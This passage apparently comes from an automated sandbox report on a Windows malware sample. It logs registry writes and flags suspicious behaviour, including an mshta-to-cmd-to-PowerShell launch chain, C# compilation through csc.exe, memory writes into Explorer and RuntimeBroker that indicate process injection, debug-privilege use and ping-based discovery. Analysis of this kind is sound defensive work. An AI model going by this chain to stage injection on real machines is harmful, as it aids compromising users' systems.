0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000004da9a6394ff8d9017746e2394ff8d9017746e2394ff8d9016bf203000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000465751622000636262373365306633323239653937653962353637616562353236326362316439356565336466383764386566383836656264333766333362303736373163300000b20009000400efbe46575162465751622e00000000000000000000000000000000000000000000000000d1499400630062006200370033006500300066003300320032003900650039003700650039006200350036003700610065006200350032003600320063006200310064003900350065006500330064006600380037006400380065006600380038003600650062006400330037006600330033006200300037003600370031006300300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000455bb1de1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63626237336530663332323965393765396235363761656235323632636231643935656533646638376438656638383665626433376633336230373637316330000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763221a7a0ff79953ee11b0c5feedb4a4667efea4c51ffbcbda499cb9a8f99fb763221a7a0ff79953ee11b0c5feedb4a4667ed2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc643910-e846-4b84	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\97979fc6-d56e-4568 = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\892e0bc0-8529-4e35	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\892e0bc0-8529-4e35 = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e11755e-2af8-4996 = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9dc47d8f-2a2b-48a8 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002fff38394ff8d9012fff38394ff8d9012fff38394ff8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000465751622000373332353363626632373261363266396635346430346361323965313536333432666632336236653535613562636132353266386432616534633836646162360000b20009000400efbe46575162465751622e00000000000000000000000000000000000000000000000000d1499400370033003200350033006300620066003200370032006100360032006600390066003500340064003000340063006100320039006500310035003600330034003200660066003200330062003600650035003500610035006200630061003200350032006600380064003200610065003400630038003600640061006200360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000455bb1de1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37333235336362663237326136326639663534643034636132396531353633343266663233623665353561356263613235326638643261653463383664616236000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb76322177a0ff79953ee11b0c5feedb4a4667efea4c51ffbcbda499cb9a8f99fb76322177a0ff79953ee11b0c5feedb4a4667ed2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ccf1ed27-012c-4c6d	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\97979fc6-d56e-4568 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7ea4114f-5e5a-4348 = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e11755e-2af8-4996 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\b7f03224272a1a744b8914ae119a8b12c1ed12c286d99831a3d3683ee0a67a0f"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3e1cb16e-fa90-42b8 = cd8a38394ff8d901	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ccf1ed27-012c-4c6d = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\956982ca-e1c9-4f96 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7ea4114f-5e5a-4348 = 084729394ff8d901	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\97979fc6-d56e-4568 = 47d54b3a4ff8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ccf1ed27-012c-4c6d = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8d91a7d611390e41c0ec45dd2f1e5b06f3b71bfcfb0eebb920ddb0d8860ba85c"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc643910-e846-4b84 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\956982ca-e1c9-4f96 = 5f1610394ff8d901	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\956982ca-e1c9-4f96 = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3e1cb16e-fa90-42b8	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3e1cb16e-fa90-42b8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\97979fc6-d56e-4568 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f5f995394ff8d9010c93f0394ff8d9010c93f0394ff8d9013b8506000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000465751622000623766303332323432373261316137343462383931346165313139613862313263316564313263323836643939383331613364333638336565306136376130660000b20009000400efbe46575162465751622e000000000000000000000000000000000000000000000000003398a200620037006600300033003200320034003200370032006100310061003700340034006200380039003100340061006500310031003900610038006200310032006300310065006400310032006300320038003600640039003900380033003100610033006400330036003800330065006500300061003600370061003000660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000455bb1de1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c62376630333232343237326131613734346238393134616531313961386231326331656431326332383664393938333161336433363833656530613637613066000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763221c7a0ff79953ee11b0c5feedb4a4667efea4c51ffbcbda499cb9a8f99fb763221c7a0ff79953ee11b0c5feedb4a4667ed2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc643910-e846-4b84 = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc643910-e846-4b84 = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\892e0bc0-8529-4e35 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000190e8a394ff8d9012302823a4ff8d9012302823a4ff8d90197ed03000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000465751622000373332353363626632373261363266396635346430346361323965313536333432666632336236653535613562636132353266386432616534633836646162360000b20009000400efbe46575162465751622e00000000000000000000000000000000000000000000000000d1499400370033003200350033006300620066003200370032006100360032006600390066003500340064003000340063006100320039006500310035003600330034003200660066003200330062003600650035003500610035006200630061003200350032006600380064003200610065003400630038003600640061006200360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000455bb1de1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37333235336362663237326136326639663534643034636132396531353633343266663233623665353561356263613235326638643261653463383664616236000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763221e7a0ff79953ee11b0c5feedb4a4667efea4c51ffbcbda499cb9a8f99fb763221e7a0ff79953ee11b0c5feedb4a4667ed2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\956982ca-e1c9-4f96 = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e11755e-2af8-4996	RuntimeBroker.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2144 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2144 PING.EXE

pid	process
2144	PING.EXE

pid	process
2144	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exePvlFbNwL.exepowershell.exeExplorer.EXE

pid	process
3904	powershell.exe
3904	powershell.exe
1292	PvlFbNwL.exe
1292	PvlFbNwL.exe
4540	powershell.exe
4540	powershell.exe
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3152 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4540 powershell.exe
3152 Explorer.EXE
3152 Explorer.EXE
3152 Explorer.EXE
3152 Explorer.EXE
3152 Explorer.EXE
3152 Explorer.EXE
428 cmd.exe

pid	process
3152	Explorer.EXE

pid	process
4540	powershell.exe
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
3152	Explorer.EXE
428	cmd.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exepowershell.exeExplorer.EXERuntimeBroker.exe

description	pid	process
Token: SeDebugPrivilege	3904	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3152	Explorer.EXE
Token: SeCreatePagefilePrivilege	3152	Explorer.EXE
Token: SeShutdownPrivilege	3832	RuntimeBroker.exe
Token: SeShutdownPrivilege	3832	RuntimeBroker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3152 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3152 Explorer.EXE

pid	process
3152	Explorer.EXE

pid	process
3152	Explorer.EXE

Suspicious use of WriteProcessMemory 55 IoCs

Processes:

mshta.execmd.exepowershell.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 756 wrote to memory of 1304	756	mshta.exe	cmd.exe
PID 756 wrote to memory of 1304	756	mshta.exe	cmd.exe
PID 756 wrote to memory of 1304	756	mshta.exe	cmd.exe
PID 1304 wrote to memory of 3904	1304	cmd.exe	powershell.exe
PID 1304 wrote to memory of 3904	1304	cmd.exe	powershell.exe
PID 1304 wrote to memory of 3904	1304	cmd.exe	powershell.exe
PID 3904 wrote to memory of 1292	3904	powershell.exe	PvlFbNwL.exe
PID 3904 wrote to memory of 1292	3904	powershell.exe	PvlFbNwL.exe
PID 3904 wrote to memory of 1292	3904	powershell.exe	PvlFbNwL.exe
PID 1704 wrote to memory of 4540	1704	mshta.exe	powershell.exe
PID 1704 wrote to memory of 4540	1704	mshta.exe	powershell.exe
PID 4540 wrote to memory of 4804	4540	powershell.exe	csc.exe
PID 4540 wrote to memory of 4804	4540	powershell.exe	csc.exe
PID 4804 wrote to memory of 2472	4804	csc.exe	cvtres.exe
PID 4804 wrote to memory of 2472	4804	csc.exe	cvtres.exe
PID 4540 wrote to memory of 4692	4540	powershell.exe	csc.exe
PID 4540 wrote to memory of 4692	4540	powershell.exe	csc.exe
PID 4692 wrote to memory of 2612	4692	csc.exe	cvtres.exe
PID 4692 wrote to memory of 2612	4692	csc.exe	cvtres.exe
PID 4540 wrote to memory of 3152	4540	powershell.exe	Explorer.EXE
PID 4540 wrote to memory of 3152	4540	powershell.exe	Explorer.EXE
PID 4540 wrote to memory of 3152	4540	powershell.exe	Explorer.EXE
PID 4540 wrote to memory of 3152	4540	powershell.exe	Explorer.EXE
PID 3152 wrote to memory of 3832	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 wrote to memory of 3832	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 wrote to memory of 3832	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 wrote to memory of 3832	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 wrote to memory of 4040	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 wrote to memory of 4040	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 wrote to memory of 4040	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 wrote to memory of 4040	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 wrote to memory of 4636	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 wrote to memory of 4636	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 wrote to memory of 4636	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 wrote to memory of 428	3152	Explorer.EXE	cmd.exe
PID 3152 wrote to memory of 428	3152	Explorer.EXE	cmd.exe
